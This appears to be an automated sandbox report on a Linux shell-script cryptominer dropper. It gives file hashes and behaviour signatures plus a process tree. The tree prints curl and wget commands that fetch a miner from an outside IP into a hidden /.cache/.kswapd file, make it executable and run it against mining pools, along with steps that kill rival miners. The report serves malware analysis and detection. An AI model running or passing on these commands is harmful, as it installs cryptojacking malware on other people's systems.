Analysis
-
max time kernel
18s -
max time network
20s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
30-06-2024 18:39
Static task
static1
Behavioral task
behavioral1
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
-
Size
5KB
-
MD5
7b72cf30ac42c20f0a14b0b87425c00a
-
SHA1
74402152ac0f0c9dfed6f76975080ce1d0d4584d
-
SHA256
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514
-
SHA512
1587b6707b334800f2c4fa7d664542cda84a63c5534b4513003f786058b7d2ef6d22f0f18bdb3d6a81c6a4ea8897453592d4c9bcea0a2e2b62a47f325dbff5eb
-
SSDEEP
96:Dy0G/8yXwI7gzNnwNnP7fbunnbunJKDnWDnbJtgTGQFE/WztGz:Dw5XwKgRaTzUbUesdtgTGQFE/G8
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
.kswapdioc pid process /.cache/.kswapd 907 .kswapd -
Attempts to change immutable files 20 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
Processes:
grepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepchattrgrepgrepgrepgrepgrepgrepgrepgreppid process 889 grep 809 grep 817 grep 821 grep 833 grep 857 grep 805 grep 861 grep 869 grep 845 grep 849 grep 763 chattr 813 grep 825 grep 829 grep 837 grep 841 grep 853 grep 865 grep 884 grep -
Enumerates running processes
Discovers information about currently running processes on the system
-
Write file to user bin folder 1 TTPs 1 IoCs
Processes:
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.shdescription ioc process File opened for modification /usr/local/bin/.fYd3diJL 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh -
Reads CPU attributes 1 TTPs 4 IoCs
Processes:
pspspspsdescription ioc process File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps -
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
Processes:
pspspspsdescription ioc process File opened for reading /proc/8/status ps File opened for reading /proc/374/status ps File opened for reading /proc/76/cmdline ps File opened for reading /proc/10/status ps File opened for reading /proc/75/cmdline ps File opened for reading /proc/76/stat ps File opened for reading /proc/76/status ps File opened for reading /proc/774/stat ps File opened for reading /proc/782/status ps File opened for reading /proc/stat ps File opened for reading /proc/5/stat ps File opened for reading /proc/20/cmdline ps File opened for reading /proc/349/cmdline ps File opened for reading /proc/71/stat ps File opened for reading /proc/20/status ps File opened for reading /proc/13/stat ps File opened for reading /proc/775/stat ps File opened for reading /proc/770/stat ps File opened for reading /proc/765/stat ps File opened for reading /proc/81/cmdline ps File opened for reading /proc/self/stat ps File opened for reading /proc/377/status ps File opened for reading /proc/10/status ps File opened for reading /proc/669/status ps File opened for reading /proc/780/stat ps File opened for reading /proc/320/cmdline ps File opened for reading /proc/657/stat ps File opened for reading /proc/744/status ps File opened for reading /proc/20/cmdline ps File opened for reading /proc/657/status ps File opened for reading /proc/794/status ps File opened for reading /proc/6/cmdline ps File opened for reading /proc/352/cmdline ps File opened for reading /proc/2/cmdline ps File opened for reading /proc/24/stat ps File opened for reading /proc/378/stat ps File opened for reading /proc/151/stat ps File opened for reading /proc/15/status ps File opened for reading /proc/684/cmdline ps File opened for reading /proc/17/status ps File opened for reading /proc/37/status ps File opened for reading /proc/691/stat ps File opened for reading /proc/82/stat ps File opened for reading /proc/770/cmdline ps File opened for reading /proc/145/stat ps File opened for reading /proc/117/status ps File opened for reading /proc/685/status ps File opened for reading /proc/sys/kernel/osrelease ps File opened for reading /proc/660/stat ps File opened for reading /proc/7/status ps File opened for reading /proc/16/status ps File opened for reading /proc/36/status ps File opened for reading /proc/166/cmdline ps File opened for reading /proc/9/cmdline ps File opened for reading /proc/82/cmdline ps File opened for reading /proc/145/status ps File opened for reading /proc/659/cmdline ps File opened for reading /proc/776/cmdline ps File opened for reading /proc/7/stat ps File opened for reading /proc/18/cmdline ps File opened for reading /proc/757/cmdline ps File opened for reading /proc/699/stat ps File opened for reading /proc/10/cmdline ps File opened for reading /proc/12/status ps -
Writes file to shm directory 1 IoCs
Malware can drop malicious files in the shm directory which will run directly from RAM.
Processes:
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.shdescription ioc process File opened for modification /dev/shm/.fYd3diJL 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.shdescription ioc process File opened for modification /tmp/.fYd3diJL 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Processes
-
/tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh/tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh1⤵
- Write file to user bin folder
- Writes file to shm directory
- Writes file to tmp directory
-
/bin/unameuname -a2⤵
-
/bin/grepgrep " rm does not remove dir"2⤵
-
/bin/rmrm --help2⤵
-
/usr/bin/wcwc -l2⤵
-
/bin/grepgrep -i "Dump libcurl equivalent"2⤵
-
/usr/bin/curlcurl --help2⤵
-
/usr/bin/wcwc -l2⤵
-
/bin/grepgrep -i "wgetrc "2⤵
-
/usr/bin/wcwc -l2⤵
-
/usr/bin/wgetwget --version2⤵
-
/usr/bin/headhead /dev/urandom2⤵
-
/usr/bin/trtr -dc A-Za-z0-92⤵
-
/usr/bin/shufshuf -i 4-16 -n 12⤵
-
/usr/bin/headhead -c 82⤵
-
/bin/rmrm -f /tmp/.fYd3diJL2⤵
-
/bin/rmrm -f /tmp/.fYd3diJL2⤵
-
/bin/rmrm -f /usr/local/bin/.fYd3diJL2⤵
-
/bin/rmrm -f /dev/shm/.fYd3diJL2⤵
-
/bin/rmrm -f /.fYd3diJL2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep -v defunct2⤵
-
/bin/grepgrep -v "sh "2⤵
-
/bin/grepgrep " sleep 120"2⤵
-
/usr/bin/wcwc -l2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep -v "sh "2⤵
-
/bin/grepgrep -v defunct2⤵
-
/bin/grepgrep " sleep 120"2⤵
-
/usr/bin/wcwc -l2⤵
-
/bin/sleepsleep 1202⤵
-
/bin/mkdirmkdir -p /.cache/2⤵
-
/usr/bin/chattrchattr -i /.cache/2⤵
- Attempts to change immutable files
-
/bin/chmodchmod 1755 /.cache/2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -v l02⤵
-
/bin/grepgrep -v eth12⤵
-
/bin/grepgrep -v lan02⤵
-
/bin/grepgrep -v "^-"2⤵
-
/bin/grepgrep -v eth02⤵
-
/bin/grepgrep -v inet02⤵
-
/bin/grepgrep -v lano2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep -v defunct2⤵
-
/bin/grepgrep -v knthread2⤵
-
/bin/grepgrep -vi aaaaaaaaaa2⤵
-
/bin/grepgrep -vi "java "2⤵
-
/bin/grepgrep -vi jenkins2⤵
-
/bin/grepgrep -vi exim2⤵
-
/usr/bin/headhead -n 12⤵
-
/usr/bin/awkawk "{if(\$3>=54.0) print \$11}"2⤵
-
/bin/grepgrep -v l02⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -v eth12⤵
-
/bin/grepgrep -v lan02⤵
-
/bin/grepgrep -v "^-"2⤵
-
/bin/grepgrep -v eth02⤵
-
/bin/grepgrep -v inet02⤵
-
/bin/grepgrep -v lano2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep -v defunct2⤵
-
/bin/grepgrep -v python2⤵
-
/bin/grepgrep -v knthread2⤵
-
/bin/grepgrep -vi aaaaaaaaaa2⤵
-
/bin/grepgrep -vi bash2⤵
-
/bin/grepgrep -vi exim2⤵
-
/usr/bin/awkawk "{if(\$3>=0.0) print \$2}"2⤵
-
/usr/bin/uniquniq2⤵
-
/bin/readlinkreadlink /proc/320/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/320/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/323/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/323/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/349/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/349/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/350/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/350/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/352/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/352/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/374/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/374/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/377/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/377/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/378/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/378/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/392/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/392/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/653/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/653/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/657/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/657/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/684/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/684/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/685/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/685/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/689/cwd2⤵
-
/bin/catcat /proc/689/comm2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //kdumpy2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/690/cwd2⤵
-
/bin/catcat /proc/690/comm2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //stahp_fdump2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/691/cwd2⤵
-
/bin/catcat /proc/691/comm2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //stahp_vma2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/695/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/695/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/699/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/699/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/761/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/761/exe2⤵
- Attempts to change immutable files
-
/bin/grepgrep x86_642⤵
-
/usr/bin/wcwc -l2⤵
-
/usr/bin/curlcurl http://138.197.206.223/.x/xmra32 -o /.cache/.kswapd2⤵
-
/usr/bin/wgetwget http://138.197.206.223/.x/xmra32 -O /.cache/.kswapd2⤵
-
/bin/chmodchmod +x /.cache/.kswapd2⤵
-
/.cache/.kswapd/.cache/.kswapd -o 185.165.171.78:8081 -o 185.86.148.14:8081 -B1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
/tmp/.fYd3diJLFilesize
9B
MD5ca4f95a3b88d33571504c0c4918c3a61
SHA18fb9bd148f0618caa1b09a0817aa26ebd7ff00e3
SHA25620571736a3d21de70769ff71883303646210f51be9b10a6e017e67b488e2e7ba
SHA5123b025f820b3effb09fd0d19d0cf92db8a3efa6d41df4a534f09daa2a16f2b05b8f0880e4c18512c1fc886b03c991719b172d6aaa7330e1d7480c1297400a89b3